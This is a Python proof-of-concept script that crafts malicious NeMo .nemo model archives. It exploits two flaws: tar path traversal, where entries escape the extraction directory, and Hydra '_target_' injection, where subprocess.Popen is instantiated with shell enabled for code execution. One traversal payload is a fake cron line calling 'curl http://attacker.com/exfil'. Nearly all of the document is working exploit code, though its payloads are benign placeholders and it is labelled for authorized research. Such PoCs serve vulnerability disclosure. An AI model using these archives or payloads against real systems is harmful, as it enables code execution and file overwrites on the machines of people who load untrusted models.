File size: 6,940 Bytes
20db0ae | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 | """
PoC: NeMo Path Traversal + Hydra _target_ Injection
=====================================================
Crafts malicious .nemo files demonstrating two vulnerabilities:
1. Path Traversal: tar.extract() in model_utils.py without _safe_extract()
2. Hydra Injection: _target_ field in config instantiates arbitrary classes
Usage:
python craft_malicious_nemo.py # Generate both PoCs
python craft_malicious_nemo.py --type traversal # Path traversal only
python craft_malicious_nemo.py --type hydra # Hydra injection only
python craft_malicious_nemo.py --verify # Show archive contents
This is for authorized security research only.
"""
import tarfile
import io
import os
import argparse
def craft_path_traversal_nemo(output_path="path_traversal.nemo"):
"""
Create a .nemo file with path traversal in tar entry names.
When model_utils.load_config() or save_artifacts() processes this file,
tar.extract() writes files outside the intended directory because
_safe_extract() is NOT used in model_utils.py (only in save_restore_connector.py).
"""
with tarfile.open(output_path, "w:") as tar:
# 1. Legitimate model_config.yaml (required for detect_prefix())
config_content = b"""model:
name: poc_path_traversal
target: nemo_test
class_path: nemo.collections.asr.models.EncDecCTCModel
"""
config_info = tarfile.TarInfo(name="model_config.yaml")
config_info.size = len(config_content)
tar.addfile(config_info, io.BytesIO(config_content))
# 2. Path traversal entry — escapes extraction directory
# When load_config calls tar.extract(f"{prefix}{MODEL_CONFIG}", path=tmp)
# the prefix from detect_prefix() is "", so it extracts "model_config.yaml"
# But save_artifacts extracts arbitrary artifact paths from the tar,
# and a crafted artifact path can escape.
payload = b"PATH_TRAVERSAL_SUCCESSFUL - written outside extraction dir\n"
# Traversal via artifact name
traversal_info = tarfile.TarInfo(name="../../../../tmp/nemo_poc_escaped.txt")
traversal_info.size = len(payload)
tar.addfile(traversal_info, io.BytesIO(payload))
# Additional traversal — overwrite a more dangerous location
payload2 = b"# Malicious cron job\n* * * * * curl http://attacker.com/exfil\n"
traversal_info2 = tarfile.TarInfo(name="../../../../tmp/nemo_poc_cron")
traversal_info2.size = len(payload2)
tar.addfile(traversal_info2, io.BytesIO(payload2))
file_size = os.path.getsize(output_path)
print(f"[+] Path traversal .nemo written to: {output_path}")
print(f" Size: {file_size} bytes")
print()
print(" Tar contents:")
with tarfile.open(output_path, "r:") as tar:
for member in tar.getmembers():
escape = " <-- PATH TRAVERSAL" if ".." in member.name else ""
print(f" {member.name}{escape}")
print()
print("[!] When loaded by nemo.utils.model_utils.load_config():")
print(" tar.extract() has NO path validation (_safe_extract not used)")
print(" Files are written outside the temp extraction directory")
return output_path
def craft_hydra_injection_nemo(output_path="hydra_injection.nemo"):
"""
Create a .nemo file with Hydra _target_ injection in config.
When setup_optimization() processes this config, it calls
hydra.utils.instantiate() with the attacker-controlled _target_,
which can point to subprocess.Popen or any importable class.
"""
# Config with malicious _target_ pointing to subprocess.Popen
config_content = b"""model:
name: poc_hydra_injection
target: nemo_test
optim:
_target_: subprocess.Popen
args:
- "echo HYDRA_TARGET_INJECTION_SUCCESSFUL"
shell: true
sched:
name: CosineAnnealing
warmup_steps: 100
"""
with tarfile.open(output_path, "w:") as tar:
config_info = tarfile.TarInfo(name="model_config.yaml")
config_info.size = len(config_content)
tar.addfile(config_info, io.BytesIO(config_content))
# Add a dummy weights file to look like a real .nemo
weights = b"\x00" * 64
weights_info = tarfile.TarInfo(name="model_weights.ckpt")
weights_info.size = len(weights)
tar.addfile(weights_info, io.BytesIO(weights))
file_size = os.path.getsize(output_path)
print(f"[+] Hydra injection .nemo written to: {output_path}")
print(f" Size: {file_size} bytes")
print()
print(" Tar contents:")
with tarfile.open(output_path, "r:") as tar:
for member in tar.getmembers():
print(f" {member.name}")
print()
print(" Malicious config excerpt:")
print(" optim:")
print(" _target_: subprocess.Popen <-- ARBITRARY CLASS INSTANTIATION")
print(' args: ["echo HYDRA_TARGET_INJECTION_SUCCESSFUL"]')
print(" shell: true")
print()
print("[!] When loaded by NeMo and setup_optimization() is called:")
print(" hydra.utils.instantiate({_target_: 'subprocess.Popen', ...})")
print(" -> Instantiates subprocess.Popen with attacker args -> RCE")
return output_path
def main():
parser = argparse.ArgumentParser(description="NeMo PoC generator")
parser.add_argument("--type", choices=["traversal", "hydra", "both"],
default="both", help="Which PoC to generate")
parser.add_argument("--verify", action="store_true",
help="Show archive contents after generation")
parser.add_argument("--output-dir", default=".", help="Output directory")
args = parser.parse_args()
paths = []
if args.type in ("traversal", "both"):
path = craft_path_traversal_nemo(
os.path.join(args.output_dir, "path_traversal.nemo"))
paths.append(path)
print()
if args.type in ("hydra", "both"):
path = craft_hydra_injection_nemo(
os.path.join(args.output_dir, "hydra_injection.nemo"))
paths.append(path)
print()
if args.verify:
for path in paths:
print(f"=== Verifying {path} ===")
with tarfile.open(path, "r:") as tar:
for member in tar.getmembers():
print(f" {member.name} ({member.size} bytes)")
if member.name == "model_config.yaml":
f = tar.extractfile(member)
if f:
print(f" Config preview:")
for line in f.read().decode().split("\n")[:10]:
print(f" {line}")
print()
if __name__ == "__main__":
main()
|